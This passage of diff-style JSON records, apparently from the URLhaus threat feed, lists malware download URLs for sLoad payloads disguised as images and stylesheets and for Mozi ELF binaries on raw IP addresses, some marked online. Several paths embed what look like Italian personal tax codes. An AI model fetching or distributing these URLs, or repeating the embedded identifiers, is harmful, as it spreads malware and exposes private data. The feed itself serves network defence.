+{"id":"961497","urlhaus_reference":"https://urlhaus.abuse.ch/url/961497/","url":"http://186.33.104.135:54469/Mozi.m","url_status":"online","host":"186.33.104.135","date_added":"2021-01-14 20:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961498","urlhaus_reference":"https://urlhaus.abuse.ch/url/961498/","url":"http://115.56.159.43:34547/Mozi.m","url_status":"online","host":"115.56.159.43","date_added":"2021-01-14 20:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961499","urlhaus_reference":"https://urlhaus.abuse.ch/url/961499/","url":"http://42.230.138.170:33932/Mozi.m","url_status":"online","host":"42.230.138.170","date_added":"2021-01-14 20:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961494","urlhaus_reference":"https://urlhaus.abuse.ch/url/961494/","url":"https://univirtek.com/viro/02478080035/blank.jpg","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:51:47 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961495","urlhaus_reference":"https://urlhaus.abuse.ch/url/961495/","url":"https://univirtek.com/viro/FRRNDR77C25D325O/map.png","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:51:47 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961492","urlhaus_reference":"https://urlhaus.abuse.ch/url/961492/","url":"https://ladiesincode.com/ladi/CNNSRG83H04F158R/blank.jpg","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:51:45 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961493","urlhaus_reference":"https://urlhaus.abuse.ch/url/961493/","url":"https://letonguesc.com/leto/02328510512/logo.css","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:51:45 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961490","urlhaus_reference":"https://urlhaus.abuse.ch/url/961490/","url":"https://cxminute.com/minu/MLILSN74B21E507L/uk.png","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:51:44 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961491","urlhaus_reference":"https://urlhaus.abuse.ch/url/961491/","url":"https://cxminute.com/minu/12875710159/blank.css","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:51:44 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961489","urlhaus_reference":"https://urlhaus.abuse.ch/url/961489/","url":"https://cxminute.com/minu/CPNLNZ65M20A200N/maps.gif","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:51:41 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961488","urlhaus_reference":"https://urlhaus.abuse.ch/url/961488/","url":"https://belfetproduction.com/bella/DLPCMN64D02D789E/logo.png","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:51:40 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961487","urlhaus_reference":"https://urlhaus.abuse.ch/url/961487/","url":"https://belfetproduction.com/bella/01844510469/1x1.jpg","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:51:17 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961485","urlhaus_reference":"https://urlhaus.abuse.ch/url/961485/","url":"https://ladiesincode.com/ladi/FRRDNI52M71E522D/logo.css","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:51:16 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961486","urlhaus_reference":"https://urlhaus.abuse.ch/url/961486/","url":"https://letonguesc.com/leto/CPPMRC65E04H980Q/it.gif","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:51:16 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961482","urlhaus_reference":"https://urlhaus.abuse.ch/url/961482/","url":"https://univirtek.com/viro/06389650018/it.css","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:51:15 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961483","urlhaus_reference":"https://urlhaus.abuse.ch/url/961483/","url":"https://belfetproduction.com/bella/CRSRRT61E15H501H/logo.png","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:51:15 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961484","urlhaus_reference":"https://urlhaus.abuse.ch/url/961484/","url":"https://cxminute.com/minu/SMPMSM67P05F205U/it.jpg","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:51:15 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961480","urlhaus_reference":"https://urlhaus.abuse.ch/url/961480/","url":"https://univirtek.com/viro/SBNPQL78A24A783E/uk.png","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:51:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961481","urlhaus_reference":"https://urlhaus.abuse.ch/url/961481/","url":"https://cxminute.com/minu/15578761007/maps.jpg","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:51:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961478","urlhaus_reference":"https://urlhaus.abuse.ch/url/961478/","url":"https://univirtek.com/viro/03079590133/1x1.png","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:51:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961479","urlhaus_reference":"https://urlhaus.abuse.ch/url/961479/","url":"https://ladiesincode.com/ladi/BNCLNR77T56M082U/it.gif","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:51:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961476","urlhaus_reference":"https://urlhaus.abuse.ch/url/961476/","url":"https://cxminute.com/minu/JNKMTJ64B29L424O/uk.css","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:50:45 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961477","urlhaus_reference":"https://urlhaus.abuse.ch/url/961477/","url":"https://belfetproduction.com/bella/PGNMRA64S22I608Z/en.png","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:50:45 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961470","urlhaus_reference":"https://urlhaus.abuse.ch/url/961470/","url":"https://cxminute.com/minu/RZKDRD77T23Z229T/logo.jpg","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:50:43 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961471","urlhaus_reference":"https://urlhaus.abuse.ch/url/961471/","url":"https://fhivelifestyle.online/nhbrwvdffsgt/adf/maps.jpg","url_status":"offline","host":"fhivelifestyle.online","date_added":"2021-01-14 20:50:43 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961472","urlhaus_reference":"https://urlhaus.abuse.ch/url/961472/","url":"https://belfetproduction.com/bella/05739900487/1x1.css","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:50:43 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961473","urlhaus_reference":"https://urlhaus.abuse.ch/url/961473/","url":"https://belfetproduction.com/bella/01767180597/map.css","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:50:43 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961474","urlhaus_reference":"https://urlhaus.abuse.ch/url/961474/","url":"https://belfetproduction.com/bella/BRNGRG55D21F394K/map.css","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:50:43 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961475","urlhaus_reference":"https://urlhaus.abuse.ch/url/961475/","url":"https://cxminute.com/minu/DLLTZN67L20L157J/1x1.css","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:50:43 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961468","urlhaus_reference":"https://urlhaus.abuse.ch/url/961468/","url":"https://cxminute.com/minu/08035410722/logo.jpg","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:50:38 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961469","urlhaus_reference":"https://urlhaus.abuse.ch/url/961469/","url":"https://univirtek.com/viro/GRNZEI60M13G346L/en.css","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:50:38 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961467","urlhaus_reference":"https://urlhaus.abuse.ch/url/961467/","url":"https://letonguesc.com/leto/03253350239/1x1.png","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:50:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961464","urlhaus_reference":"https://urlhaus.abuse.ch/url/961464/","url":"https://ladiesincode.com/ladi/10582470158/uk.css","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:50:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961465","urlhaus_reference":"https://urlhaus.abuse.ch/url/961465/","url":"https://ladiesincode.com/ladi/BTTLNZ68A56D325C/map.css","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:50:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961466","urlhaus_reference":"https://urlhaus.abuse.ch/url/961466/","url":"https://letonguesc.com/leto/NNTLRT68P28A717L/en.jpg","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:50:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961461","urlhaus_reference":"https://urlhaus.abuse.ch/url/961461/","url":"https://univirtek.com/viro/CTTNDR89A19B149W/maps.png","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961462","urlhaus_reference":"https://urlhaus.abuse.ch/url/961462/","url":"https://cxminute.com/minu/DRSNTN77B16I197U/logo.css","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961463","urlhaus_reference":"https://urlhaus.abuse.ch/url/961463/","url":"https://univirtek.com/viro/02941830735/uk.css","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961458","urlhaus_reference":"https://urlhaus.abuse.ch/url/961458/","url":"https://belfetproduction.com/bella/MNSGCM91A04G240K/it.css","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:50:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961459","urlhaus_reference":"https://urlhaus.abuse.ch/url/961459/","url":"https://ladiesincode.com/ladi/03108100615/it.jpg","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:50:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961460","urlhaus_reference":"https://urlhaus.abuse.ch/url/961460/","url":"https://cxminute.com/minu/PTACSM56A31F604X/en.png","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:50:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961455","urlhaus_reference":"https://urlhaus.abuse.ch/url/961455/","url":"https://univirtek.com/viro/00183050368/en.gif","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:49:39 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961456","urlhaus_reference":"https://urlhaus.abuse.ch/url/961456/","url":"https://cxminute.com/minu/TSNLSN58H30G912H/uk.gif","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:49:39 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961457","urlhaus_reference":"https://urlhaus.abuse.ch/url/961457/","url":"https://letonguesc.com/leto/08658331007/blank.gif","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:49:39 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961450","urlhaus_reference":"https://urlhaus.abuse.ch/url/961450/","url":"https://cxminute.com/minu/01098910324/blank.png","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:49:37 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961451","urlhaus_reference":"https://urlhaus.abuse.ch/url/961451/","url":"https://univirtek.com/viro/02794390233/uk.css","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:49:37 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961452","urlhaus_reference":"https://urlhaus.abuse.ch/url/961452/","url":"https://univirtek.com/viro/CSTDNT69D63F754D/en.css","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:49:37 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961453","urlhaus_reference":"https://urlhaus.abuse.ch/url/961453/","url":"https://univirtek.com/viro/GSTGNE91B06L219W/1x1.jpg","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:49:37 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961454","urlhaus_reference":"https://urlhaus.abuse.ch/url/961454/","url":"https://univirtek.com/viro/03610140125/map.jpg","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:49:37 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961448","urlhaus_reference":"https://urlhaus.abuse.ch/url/961448/","url":"https://belfetproduction.com/bella/CRRLRD74E09A462T/blank.png","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:49:36 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961449","urlhaus_reference":"https://urlhaus.abuse.ch/url/961449/","url":"https://univirtek.com/viro/RSTFRZ57T05G337C/maps.png","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:49:36 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961447","urlhaus_reference":"https://urlhaus.abuse.ch/url/961447/","url":"https://letonguesc.com/leto/LBRFNC56S10D952D/map.gif","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:49:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961444","urlhaus_reference":"https://urlhaus.abuse.ch/url/961444/","url":"https://univirtek.com/viro/01669890194/it.gif","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:49:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961445","urlhaus_reference":"https://urlhaus.abuse.ch/url/961445/","url":"https://letonguesc.com/leto/GTNNTN60P12H632S/maps.css","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:49:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961446","urlhaus_reference":"https://urlhaus.abuse.ch/url/961446/","url":"https://cxminute.com/minu/ZHOXBN72B06Z210N/en.css","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:49:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961442","urlhaus_reference":"https://urlhaus.abuse.ch/url/961442/","url":"https://letonguesc.com/leto/KHNGGR61S21Z112Y/uk.css","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:49:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961443","urlhaus_reference":"https://urlhaus.abuse.ch/url/961443/","url":"https://ladiesincode.com/ladi/MNRMNL75A12I531F/uk.jpg","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:49:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961438","urlhaus_reference":"https://urlhaus.abuse.ch/url/961438/","url":"https://ladiesincode.com/ladi/RBGMNL67A02L675L/uk.css","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:49:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961439","urlhaus_reference":"https://urlhaus.abuse.ch/url/961439/","url":"https://letonguesc.com/leto/RSSPPL67P15G535L/map.gif","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:49:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961440","urlhaus_reference":"https://urlhaus.abuse.ch/url/961440/","url":"https://fhivelifestyle.online/nhbrwvdffsgt/adf/uk.css","url_status":"offline","host":"fhivelifestyle.online","date_added":"2021-01-14 20:49:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961441","urlhaus_reference":"https://urlhaus.abuse.ch/url/961441/","url":"https://letonguesc.com/leto/BNTLGU67R11L706R/blank.gif","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:49:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961437","urlhaus_reference":"https://urlhaus.abuse.ch/url/961437/","url":"https://cxminute.com/minu/03713610651/map.css","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:48:37 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961436","urlhaus_reference":"https://urlhaus.abuse.ch/url/961436/","url":"https://univirtek.com/viro/01312580507/uk.png","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:48:36 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961431","urlhaus_reference":"https://urlhaus.abuse.ch/url/961431/","url":"https://cxminute.com/minu/FRNRST34B11F843P/blank.jpg","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:48:35 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961432","urlhaus_reference":"https://urlhaus.abuse.ch/url/961432/","url":"https://univirtek.com/viro/RCUNDA90D24Z100H/1x1.png","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:48:35 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961433","urlhaus_reference":"https://urlhaus.abuse.ch/url/961433/","url":"https://univirtek.com/viro/GTTGRI72H19A952D/map.css","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:48:35 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961434","urlhaus_reference":"https://urlhaus.abuse.ch/url/961434/","url":"https://univirtek.com/viro/00385010103/map.png","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:48:35 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961435","urlhaus_reference":"https://urlhaus.abuse.ch/url/961435/","url":"https://ladiesincode.com/ladi/04263990162/map.css","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:48:35 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961428","urlhaus_reference":"https://urlhaus.abuse.ch/url/961428/","url":"https://univirtek.com/viro/BNNSFN74A13G674O/logo.png","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:48:34 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961429","urlhaus_reference":"https://urlhaus.abuse.ch/url/961429/","url":"https://univirtek.com/viro/RZZCRS93B15G224O/it.gif","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:48:34 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961430","urlhaus_reference":"https://urlhaus.abuse.ch/url/961430/","url":"https://cxminute.com/minu/01495100032/maps.gif","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:48:34 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961427","urlhaus_reference":"https://urlhaus.abuse.ch/url/961427/","url":"https://letonguesc.com/leto/CMPDVD69C11G693Z/map.gif","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:48:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961426","urlhaus_reference":"https://urlhaus.abuse.ch/url/961426/","url":"https://cxminute.com/minu/LLLMRC84B29A944R/it.jpg","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:48:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961421","urlhaus_reference":"https://urlhaus.abuse.ch/url/961421/","url":"https://cxminute.com/minu/PRSSFN72L18C573S/map.css","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:48:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961422","urlhaus_reference":"https://urlhaus.abuse.ch/url/961422/","url":"https://ladiesincode.com/ladi/00814870150/1x1.png","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:48:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961423","urlhaus_reference":"https://urlhaus.abuse.ch/url/961423/","url":"https://ladiesincode.com/ladi/03635540234/it.gif","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:48:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961424","urlhaus_reference":"https://urlhaus.abuse.ch/url/961424/","url":"https://univirtek.com/viro/PLCSFN62B11D548Q/map.gif","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:48:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961425","urlhaus_reference":"https://urlhaus.abuse.ch/url/961425/","url":"https://univirtek.com/viro/03294650167/maps.jpg","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:48:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961418","urlhaus_reference":"https://urlhaus.abuse.ch/url/961418/","url":"https://univirtek.com/viro/GGLSCR73D17C627Q/blank.css","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:48:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961419","urlhaus_reference":"https://urlhaus.abuse.ch/url/961419/","url":"https://univirtek.com/viro/CRRLRA68A70H501X/maps.css","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:48:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961420","urlhaus_reference":"https://urlhaus.abuse.ch/url/961420/","url":"https://ladiesincode.com/ladi/CRSNLD59R12L840V/blank.jpg","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:48:03 